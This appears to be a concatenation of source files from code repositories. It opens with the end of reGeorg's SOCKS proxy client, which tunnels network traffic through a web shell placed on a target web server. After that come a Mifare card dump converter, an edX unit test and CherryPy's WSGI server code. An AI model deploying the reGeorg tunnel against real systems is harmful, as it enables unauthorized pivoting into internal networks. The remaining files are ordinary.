log.info("[%s:%d] HTTP [200]: cookie [%s]" % (self.target,self.port,cookie))
else:
if response.getheader("X-ERROR") != None:
log.error(response.getheader("X-ERROR"))
else:
log.error("[%s:%d] HTTP [%d]: [%s]" % (self.target,self.port,response.status,response.getheader("X-ERROR")))
log.error("[%s:%d] RemoteError: %s" % (self.target,self.port,response.data))
conn.close()
return cookie
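# --- Protocol sketch (illustrative; inferred from the handlers in this class) ---
# The server-side tunnel script is driven entirely by HTTP POSTs:
#   POST <url>?cmd=connect&target=<host>&port=<n> (X-CMD: CONNECT) -> Set-Cookie: <session>
#   POST <url>?cmd=read       (X-CMD: READ)       -> response body = bytes read from the target
#   POST <url>?cmd=forward    (X-CMD: FORWARD)    -> request body = bytes to send to the target
#   POST <url>?cmd=disconnect (X-CMD: DISCONNECT) -> tears the remote socket down
# A response counts as success when it carries "x-status: OK"; the cookie
# returned by the connect call identifies the remote socket for the session.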
def closeRemoteSession(self):
headers = {"X-CMD": "DISCONNECT", "Cookie":self.cookie}
#headers = {"Cookie":self.cookie}
params=""
conn = self.httpScheme(host=self.httpHost, port=self.httpPort)
response = conn.request("POST", self.httpPath+"?cmd=disconnect", params, headers)
if response.status == 200:
log.info("[%s:%d] Connection Terminated" % (self.target,self.port))
conn.close()
def reader(self):
conn = urllib3.PoolManager()
while True:
try:
if not self.pSocket: break
data =""
headers = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = conn.urlopen('POST', self.connectString+"?cmd=read", headers=headers, body="")
data = None
if response.status == 200:
status = response.getheader("x-status")
if status == "OK":
if response.getheader("set-cookie") != None:
cookie = response.getheader("set-cookie")
data = response.data
# Yes, I know this is horrible, but it's a quick fix for the
# Tomcat 5.x issues that have been reported; a proper fix will come later.
try:
if response.getheader("server").find("Apache-Coyote/1.1") > 0:
data = data[:len(data)-1]
except:
pass
if data is None: data = ""
else:
data = None
log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target,self.port,response.status,status,response.getheader("X-ERROR")))
else:
log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target,self.port,response.status))
if data == None:
# Remote socket closed
break
if len(data) == 0:
sleep(0.1)
continue
transferLog.info("[%s:%d] <<<< [%d]" % (self.target,self.port,len(data)))
self.pSocket.send(data)
except Exception,ex:
raise ex
self.closeRemoteSession()
log.debug("[%s:%d] Closing localsocket" % (self.target,self.port))
try:
self.pSocket.close()
except:
log.debug("[%s:%d] Localsocket already closed" % (self.target,self.port))
def writer(self):
global READBUFSIZE
conn = urllib3.PoolManager()
while True:
try:
self.pSocket.settimeout(1)
data = self.pSocket.recv(READBUFSIZE)
if not data: break
headers = {"X-CMD": "FORWARD", "Cookie": self.cookie,"Content-Type": "application/octet-stream", "Connection":"Keep-Alive"}
response = conn.urlopen('POST', self.connectString+"?cmd=forward", headers=headers, body=data)
if response.status == 200:
status = response.getheader("x-status")
if status == "OK":
if response.getheader("set-cookie") != None:
self.cookie = response.getheader("set-cookie")
else:
log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target,self.port,response.status,status,response.getheader("x-error")))
break
else:
log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target,self.port,response.status))
break
transferLog.info("[%s:%d] >>>> [%d]" % (self.target,self.port,len(data)))
except timeout:
continue
except Exception,ex:
raise ex
break
self.closeRemoteSession()
log.debug("Closing localsocket")
try:
self.pSocket.close()
except:
log.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
log.debug("Staring reader")
r = Thread(target=self.reader, args=())
r.start()
log.debug("Staring writer")
w = Thread(target=self.writer, args=())
w.start()
r.join()
w.join()
except SocksCmdNotImplemented, si:
log.error(si.message)
self.pSocket.close()
except SocksProtocolNotImplemented, spi:
log.error(spi.message)
self.pSocket.close()
except Exception, e:
log.error(e.message)
self.pSocket.close()
def askGeorg(connectString):
o = urlparse(connectString)
try:
httpPort = o.port
except:
if o.scheme == "https":
httpPort = 443
else:
httpPort = 80
httpScheme = o.scheme
httpHost = o.netloc.split(":")[0]
httpPath = o.path
if o.scheme == "http":
httpScheme = urllib3.HTTPConnectionPool
else:
httpScheme = urllib3.HTTPSConnectionPool
conn = httpScheme(host=httpHost, port=httpPort)
response = conn.request("GET", httpPath)
if response.status == 200:
if BASICCHECKSTRING == response.data.strip():
log.info(BASICCHECKSTRING)
return True
conn.close()
return False
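# Illustrative usage (the URL below is hypothetical):
#   python reGeorgSocksProxy.py -p 8888 -u http://target.example/tunnel/tunnel.jsp
# Once askGeorg() sees the "Georg says, 'All seems fine'" banner, point any
# SOCKS4/5-capable client (a browser, proxychains, ...) at 127.0.0.1:8888 and
# its traffic is relayed through the web shell.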
if __name__ == '__main__':
print """\033[1m
\033[1;33m _____
_____ ______ __|___ |__ ______ _____ _____ ______
| | | ___|| ___| || ___|/ \| | | ___|
| \ | ___|| | | || ___|| || \ | | |
|__|\__\|______||______| __||______|\_____/|__|\__\|______|
|_____|
... every office needs a tool like Georg
willem@sensepost.com / @_w_m__
sam@sensepost.com / @trowalts
etienne@sensepost.com / @kamp_staaldraad
\033[0m
"""
log.setLevel(logging.DEBUG)
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l","--listen-on",metavar="",help="The default listening address",default="127.0.0.1")
parser.add_argument("-p","--listen-port",metavar="",help="The default listening port",type=int,default="8888")
parser.add_argument("-r","--read-buff",metavar="",help="Local read buffer, max data to be sent per POST",type=int,default="1024")
parser.add_argument("-u","--url",metavar="",required=True,help="The url containing the tunnel script")
parser.add_argument("-v","--verbose",metavar="",help="Verbose output[INFO|DEBUG]",default="INFO")
args = parser.parse_args()
if args.verbose in LEVEL:
log.setLevel(LEVEL[args.verbose])
log.info("Log Level set to [%s]" % args.verbose)
log.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on,args.listen_port,args.url))
log.info("Checking if Georg is ready")
if not askGeorg(args.url):
log.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
servSock = socket(AF_INET,SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
servSock.bind((args.listen_on,args.listen_port))
servSock.listen(1000)
while True:
try:
sock,addr_info=servSock.accept()
sock.settimeout(SOCKTIMEOUT)
log.debug("Incomming connection")
session(sock,args.url).start()
except KeyboardInterrupt,ex:
break
except Exception,e:
log.error(e)
servSock.close()
| gpl-2.0 |
NocFlame/MifareClassicTool | tools/dump-file-converter/mct2eml.py | 7 | 1685 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
########################################################################
#
# Copyright 2015 Gerhard Klostermeier
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
########################################################################
from sys import exit, argv
def main():
""" Convert a MCT dump file to a .eml file (Proxmark3 emulator). """
# Are there enough arguments?
if len(argv) != 3:
usage()
# TODO: Check if the dump is complete (has all sectors and no unknown data)
# and if not, create the missing data.
# (0x00 for data, 0xFF for keys and 0x078069)
# Convert the file line by line.
with open(argv[1], 'r') as mctFile, open(argv[2], 'w') as emlFile:
for line in mctFile:
if line[:8] == '+Sector:':
continue
emlFile.write(line.lower())
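# Illustrative sketch of the conversion (the hex data below is made up):
#   MCT dump line                       resulting .eml line
#   +Sector: 0                          (dropped)
#   69D8B79FBD9E08049C98C9B1E4BB6F31    69d8b79fbd9e08049c98c9b1e4bb6f31
# i.e. "+Sector:" markers are skipped and every 16-byte (32 hex digit) block
# line is written out lower-cased, one block per line.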
def usage():
""" Print the usage. """
print('Usage: ' + argv[0] + ' <mct-dump> <output-file-(eml)>')
print('INFO: MCT dump has to be complete ' +
'(all sectors and no unknown data).')
exit(1)
if __name__ == '__main__':
main()
| gpl-3.0 |
Edraak/edraak-platform | common/lib/xmodule/xmodule/tests/test_randomize_module.py | 13 | 3955 | """
Test cases covering workflows and behaviors for the Randomize XModule
"""
import unittest
from datetime import datetime, timedelta
from pytz import UTC
from opaque_keys.edx.locator import BlockUsageLocator
from xblock.fields import ScopeIds
from xmodule.randomize_module import RandomizeModule
from .test_course_module import DummySystem as DummyImportSystem
ORG = 'test_org'
COURSE = 'test_course'
START = '2013-01-01T01:00:00'
_TODAY = datetime.now(UTC)
_LAST_WEEK = _TODAY - timedelta(days=7)
_NEXT_WEEK = _TODAY + timedelta(days=7)
class RandomizeModuleTestCase(unittest.TestCase):
"""Make sure the randomize module works"""
shard = 1
def setUp(self):
"""
Initialize dummy testing course.
"""
super(RandomizeModuleTestCase, self).setUp()
self.system = DummyImportSystem(load_error_modules=True)
self.system.seed = None
self.course = self.get_dummy_course()
self.modulestore = self.system.modulestore
def get_dummy_course(self, start=_TODAY):
"""Get a dummy course"""
self.start_xml = '''
<course org="{org}" course="{course}"
graceperiod="1 day" url_name="test"
start="{start}">
<chapter url="ch1" url_name="chapter1" display_name="CH1">
<randomize url_name="my_randomize">
<html url_name="a" display_name="A">Two houses, ...</html>
<html url_name="b" display_name="B">Three houses, ...</html>
</randomize>
</chapter>
<chapter url="ch2" url_name="chapter2" display_name="CH2">
</chapter>
</course>
'''.format(org=ORG, course=COURSE, start=start)
return self.system.process_xml(self.start_xml)
def test_import(self):
"""
Just make sure descriptor loads without error
"""
self.get_dummy_course(START)
def test_course_has_started(self):
"""
Test CourseDescriptor.has_started.
"""
self.course.start = _LAST_WEEK
self.assertTrue(self.course.has_started())
self.course.start = _NEXT_WEEK
self.assertFalse(self.course.has_started())
def test_children(self):
""" Check course/randomize module works fine """
self.assertTrue(self.course.has_children)
self.assertEquals(len(self.course.get_children()), 2)
def inner_get_module(descriptor):
"""
Override systems.get_module
This method will be called when any call is made to self.system.get_module
"""
if isinstance(descriptor, BlockUsageLocator):
location = descriptor
descriptor = self.modulestore.get_item(location, depth=None)
descriptor.xmodule_runtime = self.get_dummy_course()
descriptor.xmodule_runtime.descriptor_runtime = descriptor._runtime # pylint: disable=protected-access
descriptor.xmodule_runtime.get_module = inner_get_module
return descriptor
self.system.get_module = inner_get_module
# Get randomize_descriptor from the course & verify its children
randomize_descriptor = inner_get_module(self.course.id.make_usage_key('randomize', 'my_randomize'))
self.assertTrue(randomize_descriptor.has_children)
self.assertEquals(len(randomize_descriptor.get_children()), 2)
# Call RandomizeModule which will select an element from the list of available items
randomize_module = RandomizeModule(
randomize_descriptor,
self.system,
scope_ids=ScopeIds(None, None, self.course.id, self.course.id)
)
# Verify the selected child
self.assertEquals(len(randomize_module.get_child_descriptors()), 1, "No child is chosen")
self.assertIn(randomize_module.child.display_name, ['A', 'B'], "Unwanted child selected")
| agpl-3.0 |
sesuncedu/sdhash | sdhash-ui/cherrypy/wsgiserver/wsgiserver3.py | 82 | 78074 | """A high-speed, production ready, thread pooled, generic HTTP server.
Simplest example on how to use this module directly
(without using CherryPy's application machinery)::
from cherrypy import wsgiserver
def my_crazy_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type','text/plain')]
start_response(status, response_headers)
return ['Hello world!']
server = wsgiserver.CherryPyWSGIServer(
('0.0.0.0', 8070), my_crazy_app,
server_name='www.cherrypy.example')
server.start()
The CherryPy WSGI server can serve as many WSGI applications
as you want in one instance by using a WSGIPathInfoDispatcher::
d = WSGIPathInfoDispatcher({'/': my_crazy_app, '/blog': my_blog_app})
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', 80), d)
Want SSL support? Just set server.ssl_adapter to an SSLAdapter instance.
This won't call the CherryPy engine (application side) at all, only the
HTTP server, which is independent from the rest of CherryPy. Don't
let the name "CherryPyWSGIServer" throw you; the name merely reflects
its origin, not its coupling.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = CherryPyWSGIServer(...)
server.start()
while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
"""
__all__ = ['HTTPRequest', 'HTTPConnection', 'HTTPServer',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'CP_makefile',
'MaxSizeExceeded', 'NoSSLError', 'FatalSSLAlert',
'WorkerThread', 'ThreadPool', 'SSLAdapter',
'CherryPyWSGIServer',
'Gateway', 'WSGIGateway', 'WSGIGateway_10', 'WSGIGateway_u0',
'WSGIPathInfoDispatcher', 'get_ssl_adapter_class']
import os
try:
import queue
except:
import Queue as queue
import re
import email.utils
import socket
import sys
if 'win' in sys.platform and not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if sys.version_info < (3,1):
import io
else:
import _pyio as io
DEFAULT_BUFFER_SIZE = io.DEFAULT_BUFFER_SIZE
import threading
import time
from traceback import format_exc
from urllib.parse import unquote
from urllib.parse import urlparse
from urllib.parse import scheme_chars
import warnings
if sys.version_info >= (3, 0):
bytestr = bytes
unicodestr = str
basestring = (bytes, str)
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 3, the native string type is unicode
return n.encode(encoding)
else:
bytestr = str
unicodestr = unicode
basestring = basestring
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 2, the native string type is bytes. Assume it's already
# in the given encoding, which for ISO-8859-1 is almost always what
# was intended.
return n
LF = ntob('\n')
CRLF = ntob('\r\n')
TAB = ntob('\t')
SPACE = ntob(' ')
COLON = ntob(':')
SEMICOLON = ntob(';')
EMPTY = ntob('')
NUMBER_SIGN = ntob('#')
QUESTION_MARK = ntob('?')
ASTERISK = ntob('*')
FORWARD_SLASH = ntob('/')
quoted_slash = re.compile(ntob("(?i)%2F"))
import errno
def plat_specific_errors(*errnames):
"""Return error numbers for all errors in errnames on this platform.
The 'errno' module contains different global constants depending on
the specific platform (OS). This function will return the list of
numeric values for a given list of potential names.
"""
errno_names = dir(errno)
nums = [getattr(errno, k) for k in errnames if k in errno_names]
# de-dupe the list
return list(dict.fromkeys(nums).keys())
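# Illustrative example (result is platform-dependent): on a typical Linux
# system, plat_specific_errors("EPIPE", "WSAEPIPE") -> [32], because only
# EPIPE is defined in that platform's errno module.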
socket_error_eintr = plat_specific_errors("EINTR", "WSAEINTR")
socket_errors_to_ignore = plat_specific_errors(
"EPIPE",
"EBADF", "WSAEBADF",
"ENOTSOCK", "WSAENOTSOCK",
"ETIMEDOUT", "WSAETIMEDOUT",
"ECONNREFUSED", "WSAECONNREFUSED",
"ECONNRESET", "WSAECONNRESET",
"ECONNABORTED", "WSAECONNABORTED",
"ENETRESET", "WSAENETRESET",
"EHOSTDOWN", "EHOSTUNREACH",
)
socket_errors_to_ignore.append("timed out")
socket_errors_to_ignore.append("The read operation timed out")
socket_errors_nonblocking = plat_specific_errors(
'EAGAIN', 'EWOULDBLOCK', 'WSAEWOULDBLOCK')
comma_separated_headers = [ntob(h) for h in
['Accept', 'Accept-Charset', 'Accept-Encoding',
'Accept-Language', 'Accept-Ranges', 'Allow', 'Cache-Control',
'Connection', 'Content-Encoding', 'Content-Language', 'Expect',
'If-Match', 'If-None-Match', 'Pragma', 'Proxy-Authenticate', 'TE',
'Trailer', 'Transfer-Encoding', 'Upgrade', 'Vary', 'Via', 'Warning',
'WWW-Authenticate']]
import logging
if not hasattr(logging, 'statistics'): logging.statistics = {}
def read_headers(rfile, hdict=None):
"""Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
if line[:1] in (SPACE, TAB):
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError("Illegal header line.")
# TODO: what about TE and WWW-Authenticate?
k = k.strip().title()
v = v.strip()
hname = k
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
v = b", ".join((existing, v))
hdict[hname] = v
return hdict
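def _read_headers_example():
    """Hypothetical helper, not used by the server: a sketch showing how
    read_headers() folds repeated comma-separated headers."""
    raw = io.BytesIO(b"Accept: text/html\r\nAccept: text/plain\r\nHost: x\r\n\r\n")
    return read_headers(raw)
    # -> {b'Accept': b'text/html, text/plain', b'Host': b'x'}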
class MaxSizeExceeded(Exception):
pass
class SizeCheckWrapper(object):
"""Wraps a file-like object, raising MaxSizeExceeded if too large."""
def __init__(self, rfile, maxlen):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded()
def read(self, size=None):
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See http://www.cherrypy.org/ticket/421
if len(data) < 256 or data[-1:] == LF:
return EMPTY.join(res)
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline()
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline()
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
def next(self):
data = self.rfile.next()
self.bytes_read += len(data)
self._check_length()
return data
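def _size_check_example():
    """Hypothetical sketch: reading past maxlen raises MaxSizeExceeded,
    which the request parser maps to a 413/414 response."""
    wrapped = SizeCheckWrapper(io.BytesIO(b"x" * 64), 16)
    try:
        wrapped.read()  # pulls 64 bytes, tripping the 16-byte cap
    except MaxSizeExceeded:
        return True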
class KnownLengthRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted."""
def __init__(self, rfile, content_length):
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.remaining -= len(data)
return data
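# Illustrative example (sketch): the wrapper serves exactly the declared
# Content-Length and then reports EOF, e.g.
#   KnownLengthRFile(io.BytesIO(b"abcdef"), 4).read() -> b"abcd"
# with every subsequent read returning b"".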
class ChunkedRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
"""
def __init__(self, rfile, maxlen, bufsize=8192):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded("Request Entity Too Large", self.maxlen)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError("Bad chunked transfer size: " + repr(chunk_size))
if chunk_size <= 0:
self.closed = True
return
## if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError("Request Entity Too Large")
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
"got " + repr(crlf) + ")")
def read(self, size=None):
data = EMPTY
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
self.buffer = EMPTY
def readline(self, size=None):
data = EMPTY
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
newline_pos = self.buffer.find(LF)
if size:
if newline_pos == -1:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
# Include the newline and stop once a full line is buffered.
remaining = min(size - len(data), newline_pos + 1)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
if data.endswith(LF):
return data
else:
if newline_pos == -1:
data += self.buffer
self.buffer = EMPTY
else:
# Consume through the newline and return the completed line.
data += self.buffer[:newline_pos + 1]
self.buffer = self.buffer[newline_pos + 1:]
return data
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
if not self.closed:
raise ValueError(
"Cannot read trailers until the request body has been read.")
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError("Request Entity Too Large")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
yield line
def close(self):
self.rfile.close()
def __iter__(self):
# Yield complete lines until the chunked stream is exhausted.
line = self.readline()
while line:
yield line
line = self.readline()
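def _chunked_example():
    """Hypothetical sketch: decoding a two-chunk request body in memory."""
    raw = io.BytesIO(b"5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n")
    return ChunkedRFile(raw, 0).read()  # -> b"hello world"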
class HTTPRequest(object):
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
def __init__(self, server, conn):
self.server = server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = ntob("http")
if self.server.ssl_adapter is not None:
self.scheme = ntob("https")
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ""
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(self.conn.rfile,
self.server.max_request_header_size)
try:
success = self.read_request_line()
except MaxSizeExceeded:
self.simple_response("414 Request-URI Too Long",
"The Request-URI sent with the request exceeds the maximum "
"allowed bytes.")
return
else:
if not success:
return
try:
success = self.read_request_headers()
except MaxSizeExceeded:
self.simple_response("413 Request Entity Too Large",
"The headers sent with the request exceed the maximum "
"allowed bytes.")
return
else:
if not success:
return
self.ready = True
def read_request_line(self):
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response("400 Bad Request", "HTTP requires CRLF terminators")
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
# The [x:y] slicing is necessary for byte strings to avoid getting ord's
rp = int(req_protocol[5:6]), int(req_protocol[7:8])
except ValueError:
self.simple_response("400 Bad Request", "Malformed Request-Line")
return False
self.uri = uri
self.method = method
# uri may be an abs_path (including "http://host.domain.tld");
scheme, authority, path = self.parse_request_uri(uri)
if NUMBER_SIGN in path:
self.simple_response("400 Bad Request",
"Illegal #fragment in Request-URI.")
return False
if scheme:
self.scheme = scheme
qs = EMPTY
if QUESTION_MARK in path:
path, qs = path.split(QUESTION_MARK, 1)
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." http://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not "/this/path".
try:
atoms = [self.unquote_bytes(x) for x in quoted_slash.split(path)]
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
path = b"%2F".join(atoms)
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
# request server actual written supported response
# protocol protocol response protocol feature set
# a 1.0 1.0 1.0 1.0
# b 1.0 1.1 1.1 1.0
# c 1.1 1.0 1.0 1.0
# d 1.1 1.1 1.1 1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
# The [x:y] slicing is necessary for byte strings to avoid getting ord's
sp = int(self.server.protocol[5:6]), int(self.server.protocol[7:8])
if sp[0] != rp[0]:
self.simple_response("505 HTTP Version Not Supported")
return False
self.request_protocol = req_protocol
self.response_protocol = "HTTP/%s.%s" % min(rp, sp)
return True
def read_request_headers(self):
"""Read self.rfile into self.inheaders. Return success."""
# then all the http headers
try:
read_headers(self.rfile, self.inheaders)
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
mrbs = self.server.max_request_body_size
if mrbs and int(self.inheaders.get(b"Content-Length", 0)) > mrbs:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return False
# Persistent connection support
if self.response_protocol == "HTTP/1.1":
# Both server and client are HTTP/1.1
if self.inheaders.get(b"Connection", b"") == b"close":
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get(b"Connection", b"") != b"Keep-Alive":
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == "HTTP/1.1":
te = self.inheaders.get(b"Transfer-Encoding")
if te:
te = [x.strip().lower() for x in te.split(b",") if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == b"chunked":
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
self.simple_response("501 Unimplemented")
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get(b"Expect", b"") == b"100-continue":
# Don't use simple_response here, because it emits headers
# we don't want. See http://www.cherrypy.org/ticket/951
msg = self.server.protocol.encode('ascii') + b" 100 Continue\r\n\r\n"
try:
self.conn.wfile.write(msg)
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return True
def parse_request_uri(self, uri):
"""Parse a Request-URI into (scheme, authority, path).
Note that Request-URI's must be one of::
Request-URI = "*" | absoluteURI | abs_path | authority
Therefore, a Request-URI which starts with a double forward-slash
cannot be a "net_path"::
net_path = "//" authority [ abs_path ]
Instead, it must be interpreted as an "abs_path" with an empty first
path segment::
abs_path = "/" path_segments
path_segments = segment *( "/" segment )
segment = *pchar *( ";" param )
param = *pchar
"""
